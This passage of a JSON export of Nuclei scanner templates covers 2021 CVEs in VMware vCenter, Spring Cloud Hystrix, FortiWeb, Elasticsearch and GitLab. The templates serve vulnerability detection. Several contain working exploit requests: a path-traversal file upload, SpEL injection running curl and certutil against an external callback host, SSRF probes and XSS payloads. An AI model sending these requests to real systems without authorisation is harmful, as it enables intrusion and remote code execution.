https://nvd.nist.gov/vuln/detail/CVE-2021-21972\n - https://www.vmware.com/security/advisories/VMSA-2021-0002.html\n - http://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html\n - https://github.com/NS-Sp4ce/CVE-2021-21972\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-21972\n cwe-id: CWE-22\n epss-score: 0.97299\n epss-percentile: 0.99858\n cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n 
product: cloud_foundation\n tags: cve2021,cve,vmware,rce,vcenter,kev,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ui/vropspluginui/rest/services/getstatus\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"VSPHERE-UI-JSESSIONID\"\n condition: and\n\n - type: regex\n part: body\n regex:\n - \"(Install|Config) Final Progress\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008a71fb56cbbb561d1194e28bd9f8f4a0ca7d026f85ac836e16e922235866c4db0220094b2f806b8a6ddfe8ec4c90b89c3d4b478f62b58ddd6e652f8bfca2c3c211e9:922c64590222798bb761d5b6d8e72950", "hash": "6c747af002a7b09bc4a15a8a72de7a53", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308280" }, "name": "CVE-2021-21973.yaml", "content": "id: CVE-2021-21973\n\ninfo:\n name: VMware vSphere - Server-Side Request Forgery\n author: pdteam\n severity: medium\n description: VMware vSphere (HTML5) is susceptible to server-side request forgery due to improper validation of URLs in a vCenter Server plugin. An attacker with network access to port 443 can exploit this issue by sending a POST request to the plugin. 
This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l, and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access, data leakage, or further attacks.\n remediation: |\n Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.\n reference:\n - https://twitter.com/osama_hroot/status/1365586206982082560\n - https://twitter.com/bytehx343/status/1486582542807420928\n - https://www.vmware.com/security/advisories/VMSA-2021-0002.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21973\n - https://github.com/soosmile/POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-21973\n cwe-id: CWE-918\n epss-score: 0.15857\n epss-percentile: 0.95819\n cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: cloud_foundation\n tags: cve2021,cve,vmware,ssrf,vcenter,oast,kev\n\nhttp:\n - raw:\n - |\n GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\n Host: {{Hostname}}\n Vcip: {{interactsh-url}}\n Vcpassword: {{rand_base(6)}}\n Vcusername: {{rand_base(6)}}\n Reqresource: {{rand_base(6)}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"The server sent HTTP status code 200\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100ae2879749b829379356f96d31e87b9cf69c38a5cfaa4b2d70b07eb82ec9956a00221009d3d4e7ffba84fe659bf8dd0e6d42388727c2eef535df5f9b7f7f563595a54a9:922c64590222798bb761d5b6d8e72950", "hash": "99a7c2a91a4c2523608809b3dc52058a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308281" }, "name": "CVE-2021-21975.yaml", "content": "id: CVE-2021-21975\n\ninfo:\n name: vRealize Operations Manager API 
- Server-Side Request Forgery\n author: luci\n severity: high\n description: vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access, data leakage, or further attacks.\n remediation: |\n Apply the necessary security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://www.vmware.com/security/advisories/VMSA-2021-0004.html\n - http://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21975\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-21975\n cwe-id: CWE-918\n epss-score: 0.96694\n epss-percentile: 0.99569\n cpe: cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: cloud_foundation\n tags: cve2021,cve,kev,packetstorm,ssrf,vmware,vrealize\n\nhttp:\n - raw:\n - |\n POST /casa/nodes/thumbprints HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json;charset=UTF-8\n\n [\"127.0.0.1:443/ui/\"]\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'vRealize Operations Manager'\n - 'thumbprint'\n - 'address'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dbd882e8580bb92aba980917dec07a0ecad6b313017de33899a7bdf2d8ef04840220568bc3c9912731ec942471e6c36606a29575dd3c9687cb0df9e10c2b82f6a1b9:922c64590222798bb761d5b6d8e72950", "hash": "da9b235600cc4d498cd4f147d93b0f68", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308282" }, 
"name": "CVE-2021-21978.yaml", "content": "id: CVE-2021-21978\n\ninfo:\n name: VMware View Planner <4.6 SP1 - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.\n An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted\n file leading to remote code execution within the logupload container.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to VMware View Planner version 4.6 SP1 or later to mitigate this vulnerability.\n reference:\n - https://twitter.com/osama_hroot/status/1367258907601698816\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21978\n - https://www.vmware.com/security/advisories/VMSA-2021-0003.html\n - http://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html\n - https://github.com/HimmelAward/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-21978\n cwe-id: CWE-20\n epss-score: 0.97469\n epss-percentile: 0.99959\n cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: view_planner\n tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive\n\nhttp:\n - raw:\n - |\n POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\n Accept: text/html\n Referer: {{BaseURL}}\n Connection: close\n\n 
------WebKitFormBoundarySHHbUsfCoxlX1bpS\n Content-Disposition: form-data; name=\"logfile\"; filename=\"\"\n Content-Type: text/plain\n\n POC_TEST\n\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"len(body) == 28\"\n\n - type: word\n part: body\n words:\n - \"File uploaded successfully.\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dec5bc6259fe2ebe995f7e00acc2aeae9d9f6ca2612511f10dec4db4e5aec09c022005b30572b35de55a0959da7910704be0e21d80767290799899204fbd718bdc17:922c64590222798bb761d5b6d8e72950", "hash": "0cfc477746e9f7bab8b151c6a2affc51", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308283" }, "name": "CVE-2021-21985.yaml", "content": "id: CVE-2021-21985\n\ninfo:\n name: VMware vSphere Client (HTML5) - Remote Code Execution\n author: D0rkerDevil\n severity: critical\n description: |\n The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. 
A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.\n reference:\n - https://www.vmware.com/security/advisories/VMSA-2021-0010.html\n - https://github.com/alt3kx/CVE-2021-21985_PoC\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21985\n - http://packetstormsecurity.com/files/162812/VMware-Security-Advisory-2021-0010.html\n - https://github.com/onSec-fr/CVE-2021-21985-Checker\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-21985\n cwe-id: CWE-20\n epss-score: 0.97407\n epss-percentile: 0.9992\n cpe: cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: vcenter_server\n tags: cve2021,cve,packetstorm,rce,vsphere,vmware,kev\n\nhttp:\n - raw:\n - |\n POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/json\n\n {\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n\n matchers:\n - type: word\n part: body\n words:\n - '{\"result\":{\"isDisconnected\":'\n# digest: 490a0046304402202cc2f275dde198f9620df34fa4a311077891a497c9ced4b61ef4ea211e77ca0c022006133ed8f8077e067f578d94dc86a5d389c8b79134b6c1550dd2a130c7c6b93d:922c64590222798bb761d5b6d8e72950", "hash": "74957bcde211923f9f5b323534e6f267", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308284" }, "name": "CVE-2021-22005.yaml", "content": "id: CVE-2021-22005\n\ninfo:\n name: VMware vCenter Server - Arbitrary 
File Upload\n author: PR3R00T\n severity: critical\n description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.\n impact: |\n Allows an attacker to upload and execute arbitrary files on the target system\n remediation: |\n Apply the necessary security patches or updates provided by VMware\n reference:\n - https://kb.vmware.com/s/article/85717\n - https://www.vmware.com/security/advisories/VMSA-2021-0020.html\n - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22005\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-22005\n cwe-id: CWE-22\n epss-score: 0.97389\n epss-percentile: 0.99909\n cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: vmware\n product: cloud_foundation\n tags: cve2021,cve,vmware,vcenter,fileupload,kev,intrusive\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n test_data\n\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1 == 200\"\n - \"status_code_2 == 201\"\n - \"contains(body_1, 'VMware vSphere')\"\n - \"content_length_2 == 0\"\n condition: and\n# digest: 4a0a0047304502210096eeb1ab5ef33413e6827bc5c906e65ca58db66c0a4facc6185b209e745b14b7022003c37bb9242faba402e242e1e6d4443e7704ad4e1f9f5a437295a89d9a45f441:922c64590222798bb761d5b6d8e72950", "hash": "9b2702da4fa84bf5f05f4da8af0662fb", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308285" }, "name": "CVE-2021-22053.yaml", "content": "id: CVE-2021-22053\n\ninfo:\n name: Spring Cloud Netflix 
Hystrix Dashboard <2.2.10 - Remote Code Execution\n author: forgedhallpass\n severity: high\n description: |\n Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade to Spring Cloud Netflix Hystrix Dashboard version 2.2.10 or later to mitigate this vulnerability.\n reference:\n - https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053\n - https://tanzu.vmware.com/security/cve-2021-22053\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22053\n - https://github.com/trhacknon/Pocingit\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-22053\n cwe-id: CWE-94\n epss-score: 0.51942\n epss-percentile: 0.97288\n cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: vmware\n product: spring_cloud_netflix\n tags: cve,cve2021,rce,spring,vmware\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/'\n - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/'\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: regex\n part: interactsh_request\n 
regex:\n - 'curl|CertUtil'\n# digest: 4a0a00473045022100b4d3fe94711032d1a972803e2c53190fdefe451c2d9218a6df5094091460bd3c022017cebf0f65907519fa5d09748a58c0d8480286435615ad8a2d569a9f669b6a06:922c64590222798bb761d5b6d8e72950", "hash": "48aaa0a297f18fd0573373fba0c8e58c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308286" }, "name": "CVE-2021-22054.yaml", "content": "id: CVE-2021-22054\n\ninfo:\n name: VMware Workspace ONE UEM - Server-Side Request Forgery\n author: h1ei1\n severity: high\n description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.\n impact: |\n An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the necessary patches or updates provided by VMware to fix the vulnerability.\n reference:\n - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/\n - https://www.vmware.com/security/advisories/VMSA-2021-0029.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22054\n - https://github.com/fardeen-ahmed/Bug-bounty-Writeups\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-22054\n cwe-id: CWE-918\n epss-score: 0.74813\n epss-percentile: 0.98065\n cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: workspace_one_uem_console\n fofa-query: banner=\"/AirWatch/default.aspx\" || header=\"/AirWatch/default.aspx\"\n tags: cve2021,cve,vmware,workspace,ssrf\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Interactsh Server\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008cded273bebf41eff90732aed8ea7da8aa14ca8124eaa2032d424ca27e56d6e7022079f5f692df095ec9105de7a2f9449144593cfd651fe28038d367431e92871cc8:922c64590222798bb761d5b6d8e72950", "hash": "5680ae139186245cceedebdd764d0741", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308287" }, "name": "CVE-2021-22122.yaml", "content": "id: CVE-2021-22122\n\ninfo:\n name: FortiWeb - Cross Site Scripting\n author: dwisiswant0\n severity: medium\n description: |\n FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.\n impact: |\n Successful exploitation of this vulnerability can result in the compromise of sensitive user information, session hijacking.\n remediation: |\n Apply the latest security patches or updates provided by Fortinet to fix the XSS vulnerability in FortiWeb.\n reference:\n - https://www.fortiguard.com/psirt/FG-IR-20-122\n - https://twitter.com/ptswarm/status/1357316793753362433\n - https://fortiguard.com/advisory/FG-IR-20-122\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22122\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-22122\n cwe-id: CWE-79\n epss-score: 0.00609\n epss-percentile: 0.76286\n cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: fortinet\n product: fortiweb\n tags: cve2021,cve,fortiweb,xss,fortinet\n\nhttp:\n - 
method: GET\n path:\n - \"{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//\"\n - \"{{BaseURL}}/omni_success?cmdb_edit_path=\\\");alert('document.domain');//\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"alert('document.domain')\"\n - \"No policy has been chosen.\"\n condition: and\n# digest: 4a0a00473045022100c166482f4524b3791b930460c6d197fdf8604c263fd9455f9d2e32f58da90a5c022064d7ba4d9e05973aec6889fd5dc2a740add4ccd266523146f2df998b31ce8a66:922c64590222798bb761d5b6d8e72950", "hash": "2e13bcb31ea8c2ea3ffb176a8966014f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308288" }, "name": "CVE-2021-22145.yaml", "content": "id: CVE-2021-22145\n\ninfo:\n name: Elasticsearch 7.10.0-7.13.3 - Information Disclosure\n author: dhiyaneshDk\n severity: medium\n description: Elasticsearch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. 
This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.\n remediation: |\n Upgrade Elasticsearch to a version that is not affected by CVE-2021-22145.\n reference:\n - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml\n - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html\n - https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22145\n - https://security.netapp.com/advisory/ntap-20210827-0006/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-22145\n cwe-id: CWE-209\n epss-score: 0.96279\n epss-percentile: 0.99499\n cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: elastic\n product: elasticsearch\n tags: cve2021,cve,elasticsearch,packetstorm,elastic\n\nhttp:\n - method: POST\n path:\n - '{{BaseURL}}/_bulk'\n\n body: |\n @\n\n headers:\n Content-Type: application/json\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'root_cause'\n - 'truncated'\n - 'reason'\n condition: and\n\n - type: status\n status:\n - 400\n# digest: 4a0a00473045022014f0323c07e1c9f0a832d65c29ff4d67516455694fba9ccd53727b9fc4a6d38c022100fe6eb1ab330b614a4bd5dfc06532870a99005fcd2fabb1a02f2ed6cc21799534:922c64590222798bb761d5b6d8e72950", "hash": "db1e772b92609c39ed320f12eab96dbe", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308289" }, "name": "CVE-2021-22205.yaml", "content": "id: CVE-2021-22205\n\ninfo:\n name: GitLab CE/EE - Remote Code Execution\n author: GitLab Red Team\n 
severity: critical\n description: GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected GitLab instance.\n remediation: |\n Upgrade to GitLab CE/EE version 13.10.3 or 13.11.1 to mitigate this vulnerability.\n reference:\n - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator\n - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196\n - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json\n - https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/\n - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/\n - https://hackerone.com/reports/1154542\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22205\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2021-22205\n cwe-id: CWE-94\n epss-score: 0.97333\n epss-percentile: 0.99868\n cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*\n metadata:\n max-request: 1\n vendor: gitlab\n product: gitlab\n shodan-query: http.title:\"GitLab\"\n tags: cve2021,cve,kev,hackerone,gitlab,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/users/sign_in\"\n\n host-redirects: true\n max-redirects: 3\n matchers:\n - type: word\n words:\n - 
\"015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df\"\n - \"02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b\"\n - \"051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce\"\n - \"08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290\"\n - \"0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59\"\n - \"0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753\"\n - \"1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f\"\n - \"14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4\"\n - \"1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4\"\n - \"20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6\"\n - \"27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959\"\n - \"292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369\"\n - \"2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae\"\n - \"30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f\"\n - \"318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2\"\n - \"33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1\"\n - \"335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac\"\n - \"34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86\"\n - \"3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087\"\n - \"340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86\"\n - \"38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d\"\n - \"3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd\"\n - \"39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514\"\n - \"39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09\"\n - \"3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e\"\n - \"3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb\"\n - \"40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3\"\n - 
\"4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1\"\n - \"450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54\"\n - \"455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8\"\n - \"4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b\"\n - \"45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44\"\n - \"473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117\"\n - \"4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2\"\n - \"4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e\"\n - \"4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160\"\n - \"504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb\"\n - \"52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c\"\n - \"530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf\"\n - \"5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71\"\n - \"62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51\"\n - \"64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a\"\n - \"655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f\"\n - \"67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2\"\n - \"69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca\"\n - \"6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb\"\n - \"70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b\"\n - \"7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5\"\n - \"73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d\"\n - \"77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f\"\n - \"78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab\"\n - \"79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9\"\n - \"7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9\"\n - \"7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5\"\n - 
